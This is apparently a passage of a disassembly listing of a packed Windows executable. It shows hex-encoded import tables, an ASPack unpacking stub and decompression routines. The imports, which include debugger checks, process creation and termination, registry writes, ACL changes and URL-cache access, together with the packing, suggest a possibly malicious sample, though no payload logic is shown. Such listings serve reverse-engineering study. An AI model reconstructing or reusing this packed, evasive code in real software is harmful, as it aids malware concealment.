dd 41h, 6C430027h, 4865736Fh, 6C646E61h, 65h, 6547019Ah
dd 6D655474h, 74615070h, 4168h, 654701A4h, 63695474h, 756F436Bh
dd 746Eh, 654701ACh, 72655674h, 6E6F6973h, 0
dd 654701ADh, 72655674h, 6E6F6973h, 417845h, 654701AFh
dd 6C6F5674h, 49656D75h, 726F666Eh, 6974616Dh, 416E6Fh
dd 654701B7h, 6E695774h, 73776F64h, 65726944h, 726F7463h
dd 4179h, 6C4701BAh, 6C61626Fh, 41646441h, 416D6F74h, 0
dd 6C4701BEh, 6C61626Fh, 656C6544h, 74416574h, 6D6Fh, 6C4701BFh
dd 6C61626Fh, 646E6946h, 6D6F7441h, 41h, 6C4701C8h, 6C61626Fh
dd 6F6D654Dh, 74537972h, 73757461h, 0
dd 6E4901EBh, 6C726574h, 656B636Fh, 636E4964h, 656D6572h
dd 746Eh, 734901F1h, 52646142h, 50646165h, 7274h, 734901F4h
dd 57646142h, 65746972h, 727450h, 734901F7h, 75626544h
dd 72656767h, 73657250h, 746E65h, 6F4C0203h, 694C6461h
dd 72617262h, 4179h, 6F430033h, 69467970h, 41656Ch, 6F4C0209h
dd 416C6163h, 636F6C6Ch, 0
dd 6F4C020Dh, 466C6163h, 656572h, 704F0230h, 754D6E65h
dd 41786574h, 0
dd 704F0232h, 72506E65h, 7365636Fh, 73h, 6552025Ch, 69466461h
dd 656Ch, 74520278h, 776E556Ch, 646E69h, 74520279h, 72655A6Ch
dd 6D654D6Fh, 79726Fh, 72430042h, 65746165h, 656C6946h
dd 41h, 655302A8h, 6C694674h, 696F5065h, 7265746Eh, 0
dd 655302ACh, 6C694674h, 6D695465h, 65h, 6C5302DCh, 706565h
dd 655402E4h, 6E696D72h, 50657461h, 65636F72h, 7373h, 695602FEh
dd 61757472h, 6C6C416Ch, 636Fh, 69560300h, 61757472h, 6572466Ch
dd 65h, 69560305h, 61757472h, 6575516Ch, 7972h, 69570311h
dd 68436564h, 6F547261h, 746C754Dh, 74794269h, 65h, 69570312h
dd 6578456Eh, 63h, 7257031Dh, 46657469h, 656C69h, 7243004Fh
dd 65746165h, 6574754Dh, 4178h, 736C0345h, 656C7274h, 416Eh
dd 736C0346h, 656C7274h, 576Eh, 72430054h, 65746165h, 636F7250h
dd 41737365h, 0
dd 7243005Ah, 65746165h, 65726854h, 6461h, 61430063h, 69576C6Ch
dd 776F646Eh, 636F7250h, 41h, 6547006Ch, 6E695774h, 54776F64h
dd 41747865h, 0
dd 65470073h, 6E695774h, 52776F64h, 746365h, 69460078h
dd 6957646Eh, 776F646Eh, 41h, 6547007Ch, 6E695774h, 776F64h
dd 65470011h, 616C4374h, 614E7373h, 41656Dh, 655300CFh
dd 636F4674h, 7375h, 654700D4h, 726F4674h, 6F726765h, 57646E75h
dd 6F646E69h, 77h, 6F4C0019h, 75436461h, 726F7372h, 41h
dd 6553010Ah, 6D695474h, 7265h, 6F4C001Bh, 63496461h, 416E6Fh
dd 654D0140h, 67617373h, 786F4265h, 41h, 65470023h, 73654D74h
dd 65676173h, 41h, 65470169h, 6E695774h, 4C776F64h, 41676E6Fh
dd 0
dd 6553016Bh, 6E695774h, 4C776F64h, 41676E6Fh, 0
dd 7243016Eh, 65746165h, 6B736544h, 41706F74h, 0
dd 65530175h, 72685474h, 44646165h, 746B7365h, 706Fh, 65470176h
dd 72685474h, 44646165h, 746B7365h, 706Fh, 72540027h, 6C736E61h
dd 4D657461h, 61737365h, 6567h, 69440028h, 74617073h, 654D6863h
dd 67617373h, 4165h, 737701FBh, 6E697270h, 416674h, 65530034h
dd 654D646Eh, 67617373h, 4165h, 65520005h, 74736967h, 6C437265h
dd 41737361h, 0
dd 6F500041h, 75517473h, 654D7469h, 67617373h, 65h, 6853004Fh
dd 6957776Fh, 776F646Eh, 0
dd 72430053h, 65746165h, 646E6957h, 7845776Fh, 41h, 65440055h
dd 6F727473h, 6E695779h, 776F64h, 6F4D005Ah, 69576576h
dd 776F646Eh, 0
dd 65440061h, 6E695766h, 50776F64h, 41636F72h, 0
dd 65470089h, 6F745374h, 624F6B63h, 7463656Ah, 0
dd 655300CAh, 436B4274h, 726F6C6Fh, 0
dd 655300DDh, 78655474h, 6C6F4374h, 726Fh, 724300FAh, 65746165h
dd 73757242h, 646E4968h, 63657269h, 74h, 7243001Ch, 65746165h
dd 746E6F46h, 41h, 704F0018h, 72506E65h, 7365636Fh, 6B6F5473h
dd 6E65h, 6547001Ah, 6B6F5474h, 6E496E65h, 6D726F66h, 6F697461h
dd 6Eh, 65520173h, 65724367h, 4B657461h, 78457965h, 41h
dd 65520176h, 6F6C4367h, 654B6573h, 79h, 6552017Bh, 65704F67h
dd 79654B6Eh, 417845h, 65520186h, 65755167h, 61567972h
dd 4565756Ch, 4178h, 65520192h, 74655367h, 756C6156h, 41784565h
dd 0
dd 654701CCh, 63655374h, 74697275h, 666E4979h, 6Fh, 655301CFh
dd 63655374h, 74697275h, 666E4979h, 6Fh, 655301D6h, 746E4574h
dd 73656972h, 63416E49h, 416Ch, 6547004Ah, 64695374h, 6E656449h
dd 69666974h, 75417265h, 726F6874h, 797469h, 6547004Bh
dd 64695374h, 41627553h, 6F687475h, 79746972h, 0
dd 6547004Ch, 64695374h, 41627553h, 6F687475h, 79746972h
dd 6E756F43h, 74h, 695F00E8h, 616F74h, 5F5F0018h, 4D746547h
dd 416E6961h, 736772h, 735F0181h, 7065656Ch, 0
dd 735F01A6h, 63697274h, 706Dh, 626101F6h, 73h, 7865020Ah
dd 7469h, 656D0253h, 706D636Dh, 0
dd 656D0254h, 7970636Dh, 0
dd 656D0256h, 7465736Dh, 0
dd 61720260h, 657369h, 61720261h, 646Eh, 6973026Ah, 6C616E67h
dd 0
dd 7073026Dh, 746E6972h, 66h, 7273026Fh, 646E61h, 73730270h
dd 666E6163h, 0
dd 74730271h, 74616372h, 0
dd 74730272h, 72686372h, 0
dd 7473027Bh, 6D636E72h, 70h, 41454C4Fh, 32335455h, 4C4C442Eh
dd 0
dd offset off_448000
aWininet_dll db 'WININET.DLL',0
dd offset off_448014
dd offset off_448014
aOle32_dll db 'ole32.DLL',0
align 4
dd offset off_448028
dd offset off_448028
dd offset off_448028
dd offset off_448028
aKernel32_dll_1 db 'KERNEL32.dll',0
align 4
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
dd offset off_44803C
aUser32_dll_0 db 'USER32.DLL',0
align 4
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
dd offset off_448050
aGdi32_dll db 'GDI32.DLL',0
align 4
dd offset off_448064
dd offset off_448064
dd offset off_448064
dd offset off_448064
dd offset off_448064
aAdvapi32_dll_0 db 'ADVAPI32.DLL',0
align 4
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
dd offset off_448078
aCrtdll_dll db 'CRTDLL.DLL',0
align 4
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
dd offset off_44808C
align 1000h
_idata ends
; Section 5. (virtual address 0004A000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 0004A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_aspack segment para public 'DATA' use32
assume cs:_aspack
;org 44A000h
db 90h
; =============== S U B R O U T I N E =======================================
public start
start proc near
pusha
call sub_44A577
jmp short loc_44A055
; ---------------------------------------------------------------------------
align 4
dd 0D9000000h, 4873h, 90DB8700h, 6 dup(0)
dd 4A00001h, 0AD000000h, 0AB000000h, 809A5100h, 809AE47Ch
dd 7Ch, 3 dup(0)
db 0
; ---------------------------------------------------------------------------
loc_44A055: ; CODE XREF: start+6�j
mov ebx, offset dword_4439A4
add ebx, ebp
sub ebx, ss:dword_4439D5[ebp]
cmp ss:dword_444804[ebp], 0
mov ss:dword_444804[ebp], ebx
jnz loc_44A4DB
lea eax, dword_44480C[ebp]
push eax
call ss:dword_444918[ebp]
mov ss:dword_444808[ebp], eax
mov edi, eax
lea ebx, dword_444819[ebp]
push ebx
push eax
call ss:dword_444914[ebp]
mov ss:dword_4439E1[ebp], eax
lea ebx, dword_444826[ebp]
push ebx
push edi
call ss:dword_444914[ebp]
mov ss:dword_4439E5[ebp], eax
lea eax, dword_443B72[ebp]
jmp eax
; ---------------------------------------------------------------------------
align 10h
dd 40h, 2 dup(0)
dd 80000000h, 12190004h, 2 dup(0)
dd 10000000h, 0BA1C0000h, 0C0000000h, 0BB980003h, 80000000h
dd 10540004h, 36h dup(0)
dd 9D8B0000h, 443A66h, 0A74DB0Bh, 8587038Bh, 443A6Ah, 0B58D0389h
dd 443A82h, 0F003E83h, 11D84h, 82B58D00h, 6A00443Ah, 10006804h
dd 680000h, 6A000018h, 0E195FF00h, 89004439h, 4439DD85h
dd 4468B00h, 10E05h, 68046A00h, 1000h, 0FF006A50h, 4439E195h
dd 0D9858900h, 56004439h, 9D031E8Bh, 444804h, 39DDB5FFh
dd 76FF0044h, 0E8535004h, 339h, 39D4BD80h, 75000044h, 0D485FE5Ch
dd 8B004439h, 4BD033Eh, 0FF004448h, 0C307C637h, 78FD7FFh
dd 53565150h, 0E983C88Bh, 0D9B58B06h, 33004439h, 74C90BDBh
dd 0E83CAC2Ch, 0EB0A74h, 474E93Ch, 0EDEB4943h, 0EB068Bh
dd 75013E80h, 0C10024F3h, 0C32B18C0h, 0C3830689h, 4C68305h
dd 0EB05E983h, 595E5BD0h, 8BC88B58h, 4BD033Eh, 8B004448h
dd 4439D9B5h, 2F9C100h, 0C88BA5F3h, 0F303E183h, 685EA4h
dd 6A000080h, 0D9B5FF00h, 0FF004439h, 4439E595h, 8C68300h
dd 0F003E83h, 0FFFF2885h, 800068FFh, 6A0000h, 39DDB5FFh
dd 95FF0044h, 4439E5h, 3A669D8Bh, 0DB0B0044h, 38B0874h
dd 3A6A8587h, 958B0044h, 444804h, 3A62858Bh, 0D02B0044h
dd 0C28B7974h, 3310E8C1h, 6EB58BDBh, 300443Ah, 444804B5h
dd 3E8300h, 4E8B6174h, 8E98304h, 3E8BE9D1h, 4804BD03h
dd 0C6830044h, 1E8B6608h, 830CEBC1h, 0C7401FBh, 7402FB83h
dd 3FB8316h, 2CEB2074h, 811E8B66h, 0FFFE3h, 4016600h, 661DEB1Fh
dd 0E3811E8Bh, 0FFFh, 1F140166h, 8B660EEBh, 0FFE3811Eh
dd 100000Fh, 0EB1F14h, 0FF0E8366h, 0E202C683h, 8B9AEBB4h
dd 44480495h, 0ADB58B00h, 0B004439h, 31174F6h, 0C00BADF2h
dd 0C2030A74h, 0AD66F88Bh, 0F1EBAB66h, 3A72B58Bh, 958B0044h
dd 444804h, 468BF203h, 0FC0850Ch, 10A84h, 8BC20300h, 95FF50D8h
dd 444918h, 775C085h, 1C95FF53h, 89004449h, 4439B185h
dd 0B585C700h, 4439h, 8B000000h, 44480495h, 85068B00h
dd 8B0375C0h, 0C2031046h, 39B58503h, 188B0044h, 3107E8Bh
dd 0B5BD03FAh, 85004439h, 0A2840FDBh, 0F7000000h, 0C3h
dd 3047580h, 534343DAh, 0FFFFE381h, 0FF537FFFh, 4439B1B5h
dd 1495FF00h, 85004449h, 6F755BC0h, 0C3F7h, 19758000h
dd 0C468B57h, 48048503h, 53500044h, 487F858Dh, 57500044h
dd 99E9h, 0FFE38100h, 8B7FFFFFh, 44480885h, 0B1853900h
dd 75004439h, 0D38B5724h, 2E2C14Ah, 39B19D8Bh, 7B8B0044h
dd 3B7C8B3Ch, 3B5C0378h, 13048B1Ch, 39B18503h, 0EB5F0044h
dd 468B5716h, 485030Ch, 50004448h, 0D0858D53h, 50004448h
dd 894BEB57h, 0B5858307h, 4004439h, 0FFFF32E9h, 890689FFh
dd 46890C46h, 14C68310h, 4804958Bh, 0EBE90044h
db 0FEh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_44A4DB: ; CODE XREF: start+6E�j
mov eax, ss:dword_443A76[ebp]
push eax
add eax, ss:dword_444804[ebp]
pop ecx
or ecx, ecx
mov ss:dword_443EA1[ebp], eax
popa
jnz short loc_44A4FC
mov eax, 1
retn 0Ch
; ---------------------------------------------------------------------------
loc_44A4FC: ; CODE XREF: start+4F1�j
push offset sub_401219
retn
start endp
; ---------------------------------------------------------------------------
aLeHd db '',8,'HD',0
aNnahd db 'AHD',0
dw 5051h
dd 491495FFh, 85890044h, 4439EDh, 4851858Dh, 0FF500044h
dd 44491C95h, 4D858900h, 8D004448h, 44485C8Dh, 0FF505100h
dd 44491495h, 0F1858900h, 8B004439h, 44484D85h, 688D8D00h
dd 51004448h, 1495FF50h, 0FF004449h, 10C483D0h, 8D306A5Fh
dd 4448729Dh, 6A575300h, 0F195FF00h, 6A004439h, 0ED95FFFFh
db 39h, 44h, 0
; =============== S U B R O U T I N E =======================================
sub_44A577 proc near ; CODE XREF: start+1�p
mov ebp, [esp+0]
sub ebp, offset byte_4439AB
retn
sub_44A577 endp
; ---------------------------------------------------------------------------
db 8Bh, 44h, 24h
dd 54EC8110h, 8D000003h, 5004244Ch, 3A8E8h, 248C8B00h
dd 35Ch, 5824948Bh, 51000003h, 244C8D52h, 40DE80Ch, 0C0840000h
dd 0C8830A75h, 54C481FFh, 0C3000003h, 60248C8Bh, 8D000003h
dd 51502404h, 0C244C8Dh, 5EFE8h, 75C08400h, 0FFC8830Ah
dd 354C481h, 8BC30000h, 0C4812404h, 354h, 10C2h, 4030201h
dd 8070605h, 100E0C0Ah, 201C1814h, 40383028h, 80706050h
dd 0E0C0A0h, 0
dd 1000000h, 2010101h, 3020202h, 4030303h, 5040404h, 50505h
dd 1000000h, 3020201h, 5040403h, 7060605h, 9080807h, 0B0A0A09h
dd 0D0C0C0Bh, 0F0E0E0Dh, 1110100Fh, 3 dup(11111111h), 12121211h
dd 12121212h, 0D18B5112h, 8B956h, 39570000h, 3572044Ah
dd 0FFF8BE53h, 28BFFFFh, 8840188Ah, 890C245Ch, 8428B02h
dd 0C247C8Bh, 8108E0C1h, 0FFE7h, 8BC70B00h, 0FE03047Ah
dd 8B084289h, 47A89C7h, 0D273C13Bh, 4728B5Bh, 8B08428Bh
dd 2B10247Ch, 0B9E8D3CEh, 18h, 0FF25CF2Bh, 0D300FFFFh
dd 5FF703E8h, 5E047289h, 4C259h, 424448Bh, 824548Bh, 848189h
dd 91890000h, 88h, 8982048Dh, 8C81h, 1000500h, 8C20000h
dd 98EC8100h, 53000000h, 0D18B5655h, 0FB957h, 0AA8B0000h
dd 84h, 7C8DC033h, 0F6332C24h, 0BC8BABF3h, 0AC24h, 89EE3B00h
dd 76202454h, 8AC93315h, 5C8B380Ch, 4C8D288Ch, 4043288Ch
dd 1989C53Bh, 17B9EB72h, 89000000h, 89282474h, 72890472h
dd 24748944h, 89FF3368h, 0C71C2474h, 1102444h, 89000000h
dd 8D18244Ch, 7489086Ah, 448B1424h, 0E0D32C34h, 0FF81F803h
dd 1000000h, 24247C89h, 8E870Fh, 448B0000h, 7D892834h
dd 3C5D8B00h, 0F983C303h, 40458910h, 6C344489h, 758B4D7Ch
dd 24448B00h, 245C8B10h, 8CBA8B1Ch, 0C1000000h, 0CE8B10EEh
dd 0FF25h, 3CB2B00h, 8BD88AFBh, 89FB8AD1h, 8B1C2474h, 24748BC3h
dd 10E0C114h, 0C1C38B66h, 0ABF302E9h, 548BCA8Bh, 0E1832024h
dd 8BAAF303h, 8B24247Ch, 8B18244Ch, 83102444h, 494004C6h
dd 8304C583h, 448909F9h, 4C891024h, 74891824h, 8D0F1424h
dd 0FFFFFF62h, 0FF81h, 0F740100h, 325D5E5Fh, 0C4815BC0h
dd 98h, 8B0004C2h, 8482h, 85C93300h, 8B3B76C0h, 0AC24B4h
dd 48A0000h, 74C08431h, 88BA8B22h, 25000000h, 0FFh, 6884448Bh
dd 33870C89h, 31048AC0h, 68847C8Bh, 6884448Dh, 8B388947h
dd 8482h, 0C83B4100h, 5E5FCC72h, 5B01B05Dh, 98C481h, 4C20000h
dd 56535100h, 8B57F18Bh, 4788306h, 8B307208h, 41118A08h
dd 0C245488h, 488B0889h, 24548B08h, 8E1C10Ch, 0FFE281h
dd 0CA0B0000h, 8304508Bh, 4889F8C2h, 89CA8B08h, 0F9830450h
dd 8BD07308h, 408B0450h, 8B908h, 0CA2B0000h, 4E8BE8D3h
dd 0FE002524h, 0C13B00FFh, 968B1473h, 8Ch, 0E9C1C88Bh
dd 8ADB3310h, 0D38B111Ch, 463B3BEBh, 3B0A732Ch, 0D21B2846h
dd 0EB0AC283h, 30463B2Ch, 0BBA0773h, 0EB000000h, 34463B20h
dd 0CBA0773h, 0EB000000h, 38463B14h, 0DBA0773h, 0EB000000h
dd 3C463B08h, 0C283D21Bh, 8B0E8B0Fh, 0FA030479h, 8B047989h
dd 18B9961Ch, 2B000000h, 5FCA2BC3h, 4C8BE8D3h, 0C1034496h
dd 888E8Bh, 5B5E0000h, 5981048Bh, 575653C3h, 0D233F98Bh
dd 0B78DC033h, 268h, 0E8561689h, 25Eh, 0C7308C8Ah, 5E00443Fh
dd 1BBh, 4C68300h, 0D303E3D3h, 3AF88340h, 448BDE72h, 4F8D1024h
dd 0D1685010h, 0E8000002h, 0FFFFFD48h, 8D1C6A50h, 0A08Fh
dd 0FD3AE800h, 6A50FFFFh, 308F8D08h, 0E8000001h, 0FFFFFD2Ch
dd 8D136A50h, 1C08Fh, 0FD1EE800h, 8789FFFFh, 260h, 0F5055E5Fh
dd 5B000002h, 8B0004C2h, 8B082444h, 244C8BD1h, 2895704h
dd 8904428Dh, 440C708h, 20h, 89104289h, 0A082h, 30828900h
dd 89000001h, 1C082h, 0B9C03300h, 0BDh, 2508289h, 82890000h
dd 254h, 2588289h, 0BA8B0000h, 260h, 25C8289h, 0ABF30000h
dd 0E8AACA8Bh, 4, 8C25Fh, 30CEC81h, 8B530000h, 8D5655D9h
dd 6A57046Bh, 0E8CD8B01h, 0FFFFFC29h, 0E75C085h, 260BB8Bh
dd 0BDB90000h, 0F3000000h, 0F633AAABh, 0CD8B046Ah, 0FFFC0CE8h
dd 344488FFh, 0FE834610h, 8DED7213h, 1C0BBh, 24448D00h
dd 0CF8B5010h, 0FFFC80E8h, 75C084FFh, 5D5E5F0Bh, 0CC4815Bh
dd 0C3000003h, 0CF8BF633h, 0FFFDE4E8h, 10F883FFh, 8B8B1573h
dd 260h, 231148Ah, 0FE280D0h, 24345488h, 7560EB46h, 8B026A28h
dd 0FBB3E8CDh, 0C083FFFFh, 7EC08503h, 0F5FE814Eh, 7D000002h
dd 344C8A52h, 4C884823h, 85462434h, 0EBEA7FC0h, 11F88336h
dd 36A0E75h, 86E8CD8Bh, 83FFFFFBh, 0CEB03C0h, 0CD8B076Ah
dd 0FFFB78E8h, 0BC083FFh, 137EC085h, 2F5FE81h, 177D0000h
dd 243444C6h, 85484600h, 81ED7FC0h, 2F5FEh, 738C0F00h
dd 8DFFFFFFh, 8D242454h, 0E852104Bh, 0FFFFFBD5h, 0B75C084h
dd 5B5D5E5Fh, 30CC481h, 8DC30000h, 2F52484h, 8B8D0000h
dd 0A0h, 0FBB3E850h, 0C084FFFFh, 5E5F0B75h, 0C4815B5Dh
dd 30Ch, 248C8DC3h, 311h, 308B8D51h, 0E8000001h, 0FFFFFB91h
dd 0B75C084h, 5B5D5E5Fh, 30CC481h, 0C6C30000h, 26483h
dd 0C0330000h, 1104BC80h, 3000003h, 83400875h, 0F07208F8h
dd 83C607EBh, 264h, 60838B01h, 8D000002h, 0BE24244Ch, 2F5h
dd 1088118Ah, 754E4140h, 5D5E5FF7h, 815B01B0h, 30CC4h
dd 1E8C300h, 90000000h, 5BEE815Eh, 0C3004445h, 8B14EC83h
dd 531C2444h, 0C75655h, 0
dd 2424448Bh, 85FF3357h, 89F18BC0h, 0F10247Ch, 25B86h
dd 104E8D00h, 0FFFC7CE8h, 1003DFFh, 13730000h, 1880E8Bh
dd 47410E8Bh, 7C890E89h, 29E91024h, 3D000002h, 2D0h, 213830Fh
dd 50000h, 8BFFFFFFh, 7E083E8h, 8D03EDC1h, 0F8830250h
dd 24548907h, 94850F14h, 8D000000h, 0A08Eh, 0FC2FE800h
dd 4E8BFFFFh, 56DB3308h, 0FFFF6DE8h, 309C8AFFh, 443FABh
dd 8F9835Eh, 4E8B3272h, 41118A04h, 18245488h, 8B044E89h
dd 548B0C4Eh, 0E1C11824h, 0FFE28108h, 0B000000h, 8568BCAh
dd 89F8C283h, 0CA8B0C4Eh, 83085689h, 0CE7308F9h, 8B087E8Bh
dd 8B90C56h, 2B000000h, 0D3FB03CFh, 18B9EAh, 7E890000h
dd 81CB2B08h, 0FFFFFFE2h, 33EAD300h, 3E856C9h, 8AFFFFFFh
dd 3F8F308Ch, 8B5E0044h, 3142444h, 89C103CAh, 8A142444h
dd 26486h, 0AE9C8B00h, 268h, 0E856D233h, 0FFFFFEDAh, 0C735948Ah
dd 5E00443Fh, 0FA8BC084h, 0FF837674h, 8B717203h, 6F8D0846h
dd 8F883FDh, 468B3172h, 0C568B04h, 8A08E2C1h, 4C884008h
dd 4E8B1C24h, 4468908h, 1C24448Bh, 0FF25h, 0F8C18300h
dd 0C18BD00Bh, 8908F883h, 4E890C56h, 8BCF7308h, 7E8B0846h
dd 8B90Ch, 0C82B0000h, 0EFD3C503h, 18B9h, 8468900h, 0E781CD2Bh
dd 0FFFFFFh, 8E8DEFD3h, 130h, 0FFFB14E8h, 8DC303FFh, 5BEBF81Ch
dd 8087E83h, 468B3172h, 0C568B04h, 8A08E2C1h, 4C884008h
dd 4E8B2024h, 4468908h, 2024448Bh, 0FF25h, 0F8C18300h
dd 0C18BD00Bh, 8908F883h, 4E890C56h, 8BCF7308h, 468B0856h
dd 8B90Ch, 0CA2B0000h, 0E8D3D703h, 18B9h, 8568900h, 0FF25CF2Bh
dd 0D300FFFFh, 83D803E8h, 1A7303FBh, 509E8C8Bh, 85000002h
dd 8B3074DBh, 25096h, 9E948900h, 250h, 868B1BEBh, 254h
dd 250968Bh, 4B8D0000h, 588689FDh, 89000002h, 25496h, 508E8900h
dd 8B000002h, 247C8B06h, 148D4114h, 89C23B38h, 8B107316h
dd 40D12BD0h, 5088128Ah, 3B168BFFh, 8BF072C2h, 3102444h
dd 244489C7h, 0EBF88B10h, 0E8CE8B0Bh, 0FFFFFBF0h, 1C74C084h
dd 28247C3Bh, 0FDAB820Fh, 448BFFFFh, 38892C24h, 0B05D5E5Fh
dd 0C4835B01h, 8C214h, 325D5E5Fh, 0C4835BC0h, 8C214h, 0
dd 8, 400000h, 7C800000h, 6E72656Bh, 32336C65h, 6C6C642Eh
dd 72695600h, 6C617574h, 6F6C6C41h, 69560063h, 61757472h
dd 6572466Ch, 69560065h, 61757472h, 6F72506Ch, 74636574h
dd 69784500h, 6F725074h, 73736563h, 0
dd 65737500h, 2E323372h, 6C6C64h, 7373654Dh, 42656761h
dd 41786Fh, 72707377h, 66746E69h, 4F4C0041h, 52454441h
dd 52524520h, 5400524Fh, 70206568h, 65636F72h, 65727564h
dd 746E6520h, 70207972h, 746E696Fh, 20732520h, 6C756F63h
dd 6F6E2064h, 65622074h, 636F6C20h, 64657461h, 206E6920h
dd 20656874h, 616E7964h, 2063696Dh, 6B6E696Ch, 62696C20h
dd 79726172h, 732520h, 20656854h, 6964726Fh, 206C616Eh
dd 63207525h, 646C756Fh, 746F6E20h, 20656220h, 61636F6Ch
dd 20646574h, 74206E69h, 64206568h, 6D616E79h, 6C206369h
dd 206B6E69h, 7262696Ch, 20797261h, 90007325h, 7C80ADA0h
dd 7C80B6A1h, 7C801D77h, 0
aKernel32_dll_2 db 'kernel32.dll',0
db 2 dup(0), 47h
aEtprocaddress db 'etProcAddress',0
align 10h
aGetmodulehandl db 'GetModuleHandleA',0
db 2 dup(0), 4Ch
aOadlibrarya db 'oadLibraryA',0
dd 3 dup(0)
dd 4AF80h, 4AF70h, 3 dup(0)
dd 4B074h, 4B0C4h, 3 dup(0)
dd 4B081h, 4B0CCh, 3 dup(0)
dd 4B08Dh, 4B0D4h, 3 dup(0)
dd 4B097h, 4B0DCh, 3 dup(0)
dd 4B0A2h, 4B0E4h, 3 dup(0)
dd 4B0ACh, 4B0ECh, 3 dup(0)
dd 4B0B9h, 4B0F4h, 5 dup(0)
aOleaut32_dll db 'oleaut32.dll',0
aWininet_dll_0 db 'wininet.dll',0
aOle32_dll_0 db 'ole32.dll',0
aUser32_dll_1 db 'user32.dll',0
aGdi32_dll_0 db 'gdi32.dll',0
aAdvapi32_dll_1 db 'advapi32.dll',0
aCrtdll_dll_0 db 'crtdll.dll',0
dd 77124C05h, 0
aB_0 db '=B',0
align 4
dd 774FFAC3h, 0
dd 7E41F642h, 0
dd 77F161D1h, 0
aSwW db 'Sww',0
align 4
aIoS db 'os',0
align 4
db 0
align 2
aSysallocstring db 'SysAllocString',0
db 2 dup(0), 46h
aIndfirsturlcac db 'indFirstUrlCacheEntryA',0
align 4
dd 436F4300h, 74616572h, 736E4965h, 636E6174h, 65h, 6C6C6143h
dd 646E6957h, 7250776Fh, 41636Fh, 65470000h, 6F745374h
dd 624F6B63h, 7463656Ah, 4F000000h, 506E6570h, 65636F72h
dd 6F547373h, 6E656Bh, 695F0000h, 616F74h, 3A2h dup(0)
_aspack ends
; Section 7. (virtual address 0004D000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0004D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 44D000h
align 2000h
_idata2 ends
end start